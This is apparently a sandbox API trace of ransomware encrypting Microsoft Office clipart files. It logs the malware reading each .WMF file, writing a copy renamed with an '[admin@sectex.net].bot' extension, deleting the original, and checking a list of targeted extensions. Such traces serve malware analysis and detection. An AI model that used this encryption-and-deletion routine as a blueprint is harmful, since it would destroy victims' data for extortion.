	[0169.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.542] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.542] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0169.543] GetLastError () returned 0x0
	[0169.543] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x30f0, lpOverlapped=0x0) returned 1
	[0169.545] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3100, lpOverlapped=0x0) returned 1
	[0169.546] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.546] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.546] SetEndOfFile (hFile=0x354) returned 1
	[0169.546] CloseHandle (hObject=0x354) returned 1
	[0169.546] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.547] SetEndOfFile (hFile=0x118) returned 1
	[0169.549] CloseHandle (hObject=0x118) returned 1
	[0169.549] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.549] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153518.wmf")) returned 1
	[0169.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.550] lstrlenW (lpString=".doc") returned 4
	[0169.550] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.550] lstrlenW (lpString=".docx") returned 5
	[0169.550] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.550] lstrlenW (lpString=".pdf") returned 4
	[0169.550] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.550] lstrlenW (lpString=".xls") returned 4
	[0169.550] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.550] lstrlenW (lpString=".xlsx") returned 5
	[0169.550] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.550] lstrlenW (lpString=".ppt") returned 4
	[0169.550] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.550] lstrlenW (lpString=".zip") returned 4
	[0169.550] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.550] lstrlenW (lpString=".rar") returned 4
	[0169.550] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.550] lstrlenW (lpString=".bz2") returned 4
	[0169.550] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.550] lstrlenW (lpString=".7z") returned 3
	[0169.550] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.550] lstrlenW (lpString=".dbf") returned 4
	[0169.550] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.550] lstrlenW (lpString=".1cd") returned 4
	[0169.550] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.550] lstrlenW (lpString=".jpg") returned 4
	[0169.550] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.550] lstrlenW (lpString=".doc") returned 4
	[0169.550] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.551] lstrlenW (lpString=".docx") returned 5
	[0169.551] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.551] lstrlenW (lpString=".pdf") returned 4
	[0169.551] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.551] lstrlenW (lpString=".xls") returned 4
	[0169.551] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.551] lstrlenW (lpString=".xlsx") returned 5
	[0169.551] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.551] lstrlenW (lpString=".ppt") returned 4
	[0169.551] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.551] lstrlenW (lpString=".zip") returned 4
	[0169.551] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.551] lstrlenW (lpString=".rar") returned 4
	[0169.551] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.551] lstrlenW (lpString=".bz2") returned 4
	[0169.551] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.551] lstrlenW (lpString=".7z") returned 3
	[0169.551] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.551] lstrlenW (lpString=".dbf") returned 4
	[0169.551] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.551] lstrlenW (lpString=".1cd") returned 4
	[0169.551] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153518.WMF") returned 63
	[0169.551] lstrlenW (lpString=".jpg") returned 4
	[0169.551] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.551] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.551] lstrlenW (lpString="J0156537.WMF") returned 12
	[0169.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.553] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1376) returned 1
	[0169.553] CloseHandle (hObject=0x118) returned 1
	[0169.553] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf")) returned 0x20
	[0169.553] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0169.553] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.553] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0169.554] GetLastError () returned 0x0
	[0169.554] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x560, lpOverlapped=0x0) returned 1
	[0169.557] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x570, lpOverlapped=0x0) returned 1
	[0169.558] ReadFile (in: hFile=0x118, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.558] WriteFile (in: hFile=0x354, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.558] SetEndOfFile (hFile=0x354) returned 1
	[0169.558] CloseHandle (hObject=0x354) returned 1
	[0169.558] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.558] SetEndOfFile (hFile=0x118) returned 1
	[0169.560] CloseHandle (hObject=0x118) returned 1
	[0169.560] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.561] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0156537.wmf")) returned 1
	[0169.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.561] lstrlenW (lpString=".doc") returned 4
	[0169.561] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.561] lstrlenW (lpString=".docx") returned 5
	[0169.561] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.561] lstrlenW (lpString=".pdf") returned 4
	[0169.561] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.561] lstrlenW (lpString=".xls") returned 4
	[0169.562] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.562] lstrlenW (lpString=".xlsx") returned 5
	[0169.562] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.562] lstrlenW (lpString=".ppt") returned 4
	[0169.562] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.562] lstrlenW (lpString=".zip") returned 4
	[0169.562] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.562] lstrlenW (lpString=".rar") returned 4
	[0169.562] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.562] lstrlenW (lpString=".bz2") returned 4
	[0169.562] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.562] lstrlenW (lpString=".7z") returned 3
	[0169.562] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.562] lstrlenW (lpString=".dbf") returned 4
	[0169.562] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.562] lstrlenW (lpString=".1cd") returned 4
	[0169.562] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.562] lstrlenW (lpString=".jpg") returned 4
	[0169.562] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.562] lstrlenW (lpString=".doc") returned 4
	[0169.562] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.562] lstrlenW (lpString=".docx") returned 5
	[0169.562] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.562] lstrlenW (lpString=".pdf") returned 4
	[0169.562] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.562] lstrlenW (lpString=".xls") returned 4
	[0169.562] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.562] lstrlenW (lpString=".xlsx") returned 5
	[0169.563] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.563] lstrlenW (lpString=".ppt") returned 4
	[0169.563] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.563] lstrlenW (lpString=".zip") returned 4
	[0169.563] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.563] lstrlenW (lpString=".rar") returned 4
	[0169.563] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.563] lstrlenW (lpString=".bz2") returned 4
	[0169.563] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.563] lstrlenW (lpString=".7z") returned 3
	[0169.563] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.563] lstrlenW (lpString=".dbf") returned 4
	[0169.563] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.563] lstrlenW (lpString=".1cd") returned 4
	[0169.563] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF") returned 63
	[0169.563] lstrlenW (lpString=".jpg") returned 4
	[0169.563] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.563] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.563] lstrlenW (lpString="J0157167.WMF") returned 12
	[0169.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0169.730] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=46702) returned 1
	[0169.730] CloseHandle (hObject=0x3c4) returned 1
	[0169.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf")) returned 0x20
	[0169.731] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0169.731] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.731] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0169.732] GetLastError () returned 0x0
	[0169.732] ReadFile (in: hFile=0x3c4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xb66e, lpOverlapped=0x0) returned 1
	[0169.762] WriteFile (in: hFile=0x180, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xb670, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xb670, lpOverlapped=0x0) returned 1
	[0169.764] ReadFile (in: hFile=0x3c4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.764] WriteFile (in: hFile=0x180, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.764] SetEndOfFile (hFile=0x180) returned 1
	[0169.764] CloseHandle (hObject=0x180) returned 1
	[0169.764] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.764] SetEndOfFile (hFile=0x3c4) returned 1
	[0169.766] CloseHandle (hObject=0x3c4) returned 1
	[0169.767] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.872] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf")) returned 1
	[0169.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.902] lstrlenW (lpString=".doc") returned 4
	[0169.902] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.902] lstrlenW (lpString=".docx") returned 5
	[0169.902] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.902] lstrlenW (lpString=".pdf") returned 4
	[0169.902] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.902] lstrlenW (lpString=".xls") returned 4
	[0169.902] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.902] lstrlenW (lpString=".xlsx") returned 5
	[0169.902] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.902] lstrlenW (lpString=".ppt") returned 4
	[0169.902] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.902] lstrlenW (lpString=".zip") returned 4
	[0169.902] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.902] lstrlenW (lpString=".rar") returned 4
	[0169.902] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.902] lstrlenW (lpString=".bz2") returned 4
	[0169.902] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.902] lstrlenW (lpString=".7z") returned 3
	[0169.902] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.902] lstrlenW (lpString=".dbf") returned 4
	[0169.902] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.902] lstrlenW (lpString=".1cd") returned 4
	[0169.902] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.902] lstrlenW (lpString=".jpg") returned 4
	[0169.902] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.903] lstrlenW (lpString=".doc") returned 4
	[0169.903] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.903] lstrlenW (lpString=".docx") returned 5
	[0169.903] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0169.903] lstrlenW (lpString=".pdf") returned 4
	[0169.903] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.903] lstrlenW (lpString=".xls") returned 4
	[0169.903] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.903] lstrlenW (lpString=".xlsx") returned 5
	[0169.903] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0169.903] lstrlenW (lpString=".ppt") returned 4
	[0169.903] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.903] lstrlenW (lpString=".zip") returned 4
	[0169.903] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.903] lstrlenW (lpString=".rar") returned 4
	[0169.903] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.903] lstrlenW (lpString=".bz2") returned 4
	[0169.903] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.903] lstrlenW (lpString=".7z") returned 3
	[0169.903] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.903] lstrlenW (lpString=".dbf") returned 4
	[0169.903] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.903] lstrlenW (lpString=".1cd") returned 4
	[0169.903] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned 63
	[0169.903] lstrlenW (lpString=".jpg") returned 4
	[0169.903] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.904] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.904] lstrlenW (lpString="J0174315.WMF") returned 12
	[0169.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174315.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.904] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=5864) returned 1
	[0169.904] CloseHandle (hObject=0x17c) returned 1
	[0169.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174315.wmf")) returned 0x20
	[0169.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174315.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174315.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0169.905] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
